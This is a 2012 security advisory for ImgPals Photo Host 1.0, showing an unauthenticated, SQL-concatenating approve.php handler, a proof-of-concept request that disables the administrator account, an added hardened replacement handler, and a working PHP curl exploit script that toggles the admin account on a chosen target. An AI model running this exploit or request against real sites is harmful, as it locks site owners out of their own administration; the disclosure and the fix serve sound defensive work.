ImgPals Photo Host Version 1.0 Admin Account Disactivation
Source: corryl80@gmail.com  Author: CorryL  Published: 2012-03-01
-=[--------------------ADVISORY-------------------]=-
ImgPals Photo Host Version 1.0 STABLE
Author: Corrado Liotta Aka CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-
-=[+] Application: ImgPals Photo Host
-=[+] Version: 1.0 STABLE
-=[+] Vendor's URL: http://www.imgpals.com/forum/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Admin Account Disactivation
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
...::[ Description ]::..
I released the ImgPals Photo Host Version 1.0 STABLE
Features Include:
    * Easy Install
    * Full README file included
    * Full Control Panel to control your site
    * User Side Features
          o Multiple JQuery Uploads
          o Create and Edit Photo Albums
          o Make Albums Public or Private
          o Describe Albums and Photos
          o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
          o Add Friends
          o Chat with Friends
          o Update people with status wall posting
          o Manage Profile
          o Profile Avatar Uploads
          o Private Messaging
    * And much more, be sure to check out the Demo
...::[ Bug ]::..
An attacker can remotely disable the administrator account, preventing the
administrator from accessing the site.
...::[ Proof Of Concept ]::..
 if ($_GET['a'] == 'app0'){
     // approve.php: no authentication or authorization check is made before the
     // update, and $_GET['u'] is concatenated straight into the SQL statement
     $sqlapprove = mysql_query("UPDATE members SET approved = '0' WHERE id = '".$_GET['u']."'");
 }
By sending the request approve.php?u=1&a=app0 an attacker can disable the
Administrator account.
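The Bug and Proof Of Concept sections above describe the same root cause: approve.php changes a member's approval state without checking who is asking, and builds its SQL by string concatenation. The following is an added example of a hardened replacement for that handler; it is not ImgPals code and was not written by the advisory author. The session key admin_id, the csrf_token field, the PDO DSN and the database credentials are assumptions, only the approve.php name, the members table and the approved/id columns and the app0/app1 values come from the advisory.

```php
<?php
// Added example, not ImgPals code: a hardened approve.php. The session key
// 'admin_id', the 'csrf_token' field and the DSN/credentials are assumptions.
declare(strict_types=1);

session_start();

// 1. Authentication and authorization: only a logged-in administrator may
//    change approval state. The original handler had no such check at all.
if (empty($_SESSION['admin_id'])) {
    http_response_code(403);
    exit('Forbidden');
}

// 2. A state-changing action must arrive by POST with a CSRF token bound to
//    the session, so a crafted GET link cannot trigger it.
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || !isset($_POST['csrf_token'], $_SESSION['csrf_token'])
    || !hash_equals((string) $_SESSION['csrf_token'], (string) $_POST['csrf_token'])) {
    http_response_code(403);
    exit('Bad request');
}

// 3. Input validation: the member id must be a positive integer and the
//    action must be one of a fixed allow-list; anything else is rejected.
$memberId = filter_input(INPUT_POST, 'u', FILTER_VALIDATE_INT,
    ['options' => ['min_range' => 1]]);
$action = $_POST['a'] ?? '';
$approvedByAction = ['app0' => 0, 'app1' => 1];
if ($memberId === false || $memberId === null
    || !array_key_exists($action, $approvedByAction)) {
    http_response_code(400);
    exit('Invalid parameters');
}

// 4. Lockout guard: refuse to deactivate the account that is currently
//    performing the action (a safety net, not the security boundary).
if ($memberId === (int) $_SESSION['admin_id'] && $approvedByAction[$action] === 0) {
    http_response_code(400);
    exit('Refusing to deactivate the current administrator');
}

// 5. Parameterised query instead of "... WHERE id = '".$_GET['u']."'", which
//    is also an SQL injection sink. DSN and credentials are placeholders.
$pdo = new PDO('mysql:host=localhost;dbname=imgpals;charset=utf8mb4',
    'DB_USER_PLACEHOLDER', 'DB_PASSWORD_PLACEHOLDER', [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
$stmt = $pdo->prepare('UPDATE members SET approved = :approved WHERE id = :id');
$stmt->execute([':approved' => $approvedByAction[$action], ':id' => $memberId]);

// 6. Audit trail: record which administrator changed whose approval state,
//    so an unexpected deactivation can be traced after the fact.
error_log(sprintf('approve.php: admin %d set approved=%d for member %d',
    (int) $_SESSION['admin_id'], $approvedByAction[$action], $memberId));

echo $stmt->rowCount() === 1 ? 'Updated' : 'No such member';
```

The control-panel form that posts to this script must embed the same token it checks, e.g. one generated once per session with bin2hex(random_bytes(32)) and stored in $_SESSION['csrf_token']. The ordering matters: the authorization check comes before any parameter is read, so an unauthenticated request is rejected without touching the database, and the allow-list of actions means a new action value cannot be introduced without a code change.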
...::[ Exploit ]::..
#!/usr/bin/php -f
<?php
//Coded by Corrado Liotta For educational purpose only
//use php exploit.php server app0 or app1
//use app0 for admin account off
//use app1 for admin account on
$target = $argv[1];
$power = $argv[2];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>